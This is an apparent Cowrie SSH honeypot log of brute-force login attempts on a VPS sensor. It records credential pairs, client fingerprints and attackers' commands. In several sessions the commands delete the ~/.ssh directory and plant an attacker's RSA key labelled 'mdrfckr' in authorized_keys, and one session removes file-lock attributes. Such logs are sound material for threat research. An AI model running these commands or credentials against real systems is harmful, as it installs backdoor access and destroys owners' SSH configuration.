{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:02:28.343523Z","src_ip":"158.51.124.56","session":"fdad8a5f50e0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:02:28.671793Z","src_ip":"158.51.124.56","session":"fdad8a5f50e0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T15:02:28.672626Z","src_ip":"158.51.124.56","session":"fdad8a5f50e0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T15:02:28.813255Z","src_ip":"158.51.124.56","session":"fdad8a5f50e0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:02:28.814285Z","src_ip":"158.51.124.56","session":"fdad8a5f50e0"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":54106,"dst_ip":"1.2.3.4","dst_port":22,"session":"9da4e32af1ae","protocol":"ssh","message":"New connection: 158.51.124.56:54106 (1.2.3.4:22) [session: 9da4e32af1ae]","sensor":"my-vps","timestamp":"2025-09-08T15:02:28.951634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:02:28.952250Z","src_ip":"158.51.124.56","session":"9da4e32af1ae"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:02:29.091939Z","src_ip":"158.51.124.56","session":"9da4e32af1ae"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T15:02:29.692119Z","src_ip":"158.51.124.56","session":"9da4e32af1ae"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:02:30.834619Z","src_ip":"158.51.124.56","session":"9da4e32af1ae"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":55212,"dst_ip":"1.2.3.4","dst_port":22,"session":"a51b6a56a199","protocol":"ssh","message":"New connection: 158.51.124.56:55212 (1.2.3.4:22) [session: a51b6a56a199]","sensor":"my-vps","timestamp":"2025-09-08T15:02:30.972025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:02:30.973037Z","src_ip":"158.51.124.56","session":"a51b6a56a199"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:02:31.111202Z","src_ip":"158.51.124.56","session":"a51b6a56a199"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:02:31.708295Z","src_ip":"158.51.124.56","session":"a51b6a56a199"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:02:31.848955Z","src_ip":"158.51.124.56","session":"fdad8a5f50e0"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:02:31.850064Z","src_ip":"158.51.124.56","session":"a51b6a56a199"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":49322,"dst_ip":"1.2.3.4","dst_port":22,"session":"b0c4ae9b9c27","protocol":"ssh","message":"New connection: 185.255.91.51:49322 (1.2.3.4:22) [session: b0c4ae9b9c27]","sensor":"my-vps","timestamp":"2025-09-08T15:03:03.437030Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:03:03.439397Z","src_ip":"185.255.91.51","session":"b0c4ae9b9c27"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:03:03.538636Z","src_ip":"185.255.91.51","session":"b0c4ae9b9c27"}
{"eventid":"cowrie.login.failed","username":"vagrant","password":"123","message":"login attempt [vagrant/123] failed","sensor":"my-vps","timestamp":"2025-09-08T15:03:03.939304Z","src_ip":"185.255.91.51","session":"b0c4ae9b9c27"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:03:05.047460Z","src_ip":"185.255.91.51","session":"b0c4ae9b9c27"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43801,"dst_ip":"1.2.3.4","dst_port":22,"session":"513906419af5","protocol":"ssh","message":"New connection: 212.227.235.229:43801 (1.2.3.4:22) [session: 513906419af5]","sensor":"my-vps","timestamp":"2025-09-08T15:03:16.407705Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:03:16.408782Z","src_ip":"212.227.235.229","session":"513906419af5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44167,"dst_ip":"1.2.3.4","dst_port":22,"session":"fb7444e3fa09","protocol":"ssh","message":"New connection: 212.227.235.229:44167 (1.2.3.4:22) [session: fb7444e3fa09]","sensor":"my-vps","timestamp":"2025-09-08T15:03:16.520105Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T15:03:16.521011Z","src_ip":"212.227.235.229","session":"fb7444e3fa09"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-09-08T15:03:16.658407Z","src_ip":"212.227.235.229","session":"fb7444e3fa09"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:03:17.070831Z","src_ip":"212.227.235.229","session":"fb7444e3fa09"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-09-08T15:03:17.209032Z","session":"fb7444e3fa09"}
{"eventid":"cowrie.session.connect","src_ip":"158.51.124.56","src_port":50992,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4628609ae23","protocol":"ssh","message":"New connection: 158.51.124.56:50992 (1.2.3.4:22) [session: f4628609ae23]","sensor":"my-vps","timestamp":"2025-09-08T15:03:29.480826Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:03:29.481642Z","src_ip":"158.51.124.56","session":"f4628609ae23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:03:29.619445Z","src_ip":"158.51.124.56","session":"f4628609ae23"}
{"eventid":"cowrie.login.failed","username":"ftptest","password":"2025","message":"login attempt [ftptest/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T15:03:30.171638Z","src_ip":"158.51.124.56","session":"f4628609ae23"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:03:31.313237Z","src_ip":"158.51.124.56","session":"f4628609ae23"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":58776,"dst_ip":"1.2.3.4","dst_port":22,"session":"4cb7ca03899c","protocol":"ssh","message":"New connection: 185.255.91.51:58776 (1.2.3.4:22) [session: 4cb7ca03899c]","sensor":"my-vps","timestamp":"2025-09-08T15:04:08.000025Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:04:08.001508Z","src_ip":"185.255.91.51","session":"4cb7ca03899c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:04:08.103495Z","src_ip":"185.255.91.51","session":"4cb7ca03899c"}
{"eventid":"cowrie.login.success","username":"root","password":"palosanto","message":"login attempt [root/palosanto] succeeded","sensor":"my-vps","timestamp":"2025-09-08T15:04:08.515057Z","src_ip":"185.255.91.51","session":"4cb7ca03899c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:04:08.741959Z","src_ip":"185.255.91.51","session":"4cb7ca03899c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:04:08.742738Z","src_ip":"185.255.91.51","session":"4cb7ca03899c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T15:04:08.743788Z","src_ip":"185.255.91.51","session":"4cb7ca03899c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:04:08.846193Z","src_ip":"185.255.91.51","session":"4cb7ca03899c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T15:04:09.147383Z","src_ip":"185.255.91.51","session":"4cb7ca03899c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T15:04:09.148111Z","src_ip":"185.255.91.51","session":"4cb7ca03899c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T15:04:09.251261Z","src_ip":"185.255.91.51","session":"4cb7ca03899c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:04:09.252177Z","src_ip":"185.255.91.51","session":"4cb7ca03899c"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":58782,"dst_ip":"1.2.3.4","dst_port":22,"session":"eda7ce6cad48","protocol":"ssh","message":"New connection: 185.255.91.51:58782 (1.2.3.4:22) [session: eda7ce6cad48]","sensor":"my-vps","timestamp":"2025-09-08T15:04:09.342208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:04:09.342968Z","src_ip":"185.255.91.51","session":"eda7ce6cad48"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T15:04:09.439467Z","src_ip":"185.255.91.51","session":"eda7ce6cad48"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T15:04:09.867980Z","src_ip":"185.255.91.51","session":"eda7ce6cad48"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T15:04:10.980622Z","src_ip":"185.255.91.51","session":"eda7ce6cad48"}
{"eventid":"cowrie.session.connect","src_ip":"185.255.91.51","src_port":58798,"dst_ip":"1.2.3.4","dst_port":22,"session":"da717ecec5bb","protocol":"ssh","message":"New connection: 185.255.91.51:58798 (1.2.3.4:22) [session: da717ecec5bb]","sensor":"my-vps","timestamp":"2025-09-08T15:04:11.077276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T15:04:11.314042Z","src_ip":"185.255.91.51","session":"da717ecec5bb"}
